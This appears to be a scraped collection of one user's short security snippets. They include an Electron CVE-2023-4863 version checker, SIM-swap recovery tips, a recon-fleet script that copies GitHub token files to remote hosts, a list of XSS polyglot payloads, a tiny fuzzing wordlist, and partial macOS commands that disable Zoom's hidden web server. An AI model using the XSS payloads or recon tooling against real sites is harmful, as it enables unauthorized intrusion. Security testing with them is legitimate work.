w3llr00t3d

#!/usr/bin/env zsh

# patched versions for CVE-2023-4863: 22.3.24, 24.8.3, 25.8.1, 26.2.1
mdfind "kind:app" 2>/dev/null | sort -u | while read app;
do
  filename="$app/Contents/Frameworks/Electron Framework.framework/Electron Framework"
  if [[ -f $filename ]]; then
    echo "App Name:          $(basename ${app})"

    electronVersion=$(strings "$filename" | grep "Chrome/" | grep -i Electron | grep -v '%s' | sort -u | cut -f 3 -d '/')

w3llr00t3d

Here's how this attack works: https://www.google.com/amp/s/www.zdnet.com/google-amp/article/how-i-survived-a-sim-swap-attack-and-how-my-carrier-failed-me/

Immediate actions

• Make sure your primary email address has a secure recovery method and remove your old phone number from it.
  • Gmail lets you set "Backup codes" that you can print off to recover your account.
  • Change your email password and put it in a password manager.
  • Remove any link to the old phone number from your email.
• If you're already locked out of your email, set up a "clean" email account. At this point, your old one is being accessed by hackers and can be used to reset any banking passwords.
• Store this new email password in a password manager.

w3llr00t3d

#!/bin/bash

# Use this as initial axiom's script on reconftw.cfg file to copy config files to the fleet

axiom-exec 'mkdir -p /home/op/.config/amass/ /home/op/Tools/ /home/op/.config/subfinder/ /home/op/.config/notify/'
axiom-scp ~/.config/amass/config.ini '*':/home/op/.config/amass/config.ini
axiom-scp ~/Tools/h8mail_config.ini '*':/home/op/Tools/h8mail_config.ini
axiom-scp ~/Tools/.github_tokens '*':/home/op/Tools/.github_tokens
axiom-scp ~/.config/notify/notify.conf '*':/home/op/.config/notify/notify.conf
axiom-scp ~/Tools/.github_tokens '*':/home/op/Tools/.github_tokens

w3llr00t3d

w3llr00t3d

w3llr00t3d

Keybase proof

I hereby claim:

• I am wellr00t3d on github.
• I am wellr00t3d (https://keybase.io/wellr00t3d) on keybase.
• I have a public key ASDm-BJAFHLhryWdjcHLMcGnL2ZX-oMCToBKUVL5VAHCWQo

To claim this, I am signing this object:

w3llr00t3d

jaVasCript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//>
javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/--><svg/onload=/*<html/*/onmouseover=alert()//> 
javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>--><svg onload=/*<html/*/onmouseover=alert()//>
javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template><svg/onload='/*--><html */ onmouseover=alert()//'>` 
javascript:`/*\"/*--><svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert()//'">`
javascript:"/*'//`//\"//</template/</title/</textarea/</style/</noscript/</noembed/</script/--><script>/<i<frame */ onload=alert()//</script>
javascript:"/*`/*\"/*'/*</stYle/</titLe/</teXtarEa/</nOscript><

w3llr00t3d

.
..
........
@
*
*.*
*.*.*
🐎

w3llr00t3d

# coding=utf-8
# python3

from urllib.parse import urlparse

import requests
import urllib3

from bs4 import BeautifulSoup

w3llr00t3d

If you're using macOS, run these commands:

pkill "ZoomOpener"; rm -rf ~/.zoomus; touch ~/.zoomus && chmod 000 ~/.zoomus;
pkill "RingCentralOpener"; rm -rf ~/.ringcentralopener; touch ~/.ringcentralopener && chmod 000 ~/.ringcentralopener;

These two commands do the same thing for the two most popular "brands" of Zoom (Zoom, and RingCentral). They first kill the hidden server if it is running, and then regardless deletes it from its hidden directory if it exists there. Finally they create an empty file